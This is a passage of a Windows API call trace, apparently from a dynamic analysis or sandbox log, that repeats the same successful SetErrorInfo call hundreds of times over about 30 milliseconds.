[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.096] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.096] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.096] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.096] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.096] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.098] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.099] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.101] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.102] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.103] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.103] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.103] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.103] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.103] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.103] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.104] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.104] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.104] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.104] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.104] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.104] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.104] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.106] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.106] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.106] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.106] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.106] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.106] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.107] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.108] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.109] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.111] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.112] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.114] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.114] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.114] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.114] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.114] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.114] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.114] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.115] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.115] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.115] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.115] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.115] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.115] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.116] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.116] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.116] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.116] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.116] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.116] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.117] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.118] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.118] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.118] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.118] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.118] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.118] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.119] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.119] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.119] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.119] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.119] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.119] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.120] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.120] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.120] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.120] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.120] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.120] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.121] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.121] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.121] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.121] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.121] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.122] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.122] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.122] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.122] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.122] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.122] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.123] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.123] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.123] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.123] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.124] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
